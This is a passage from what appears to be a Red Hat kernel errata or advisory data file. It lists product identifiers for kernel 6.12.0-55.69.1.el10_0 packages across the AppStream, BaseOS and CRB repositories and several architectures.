"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
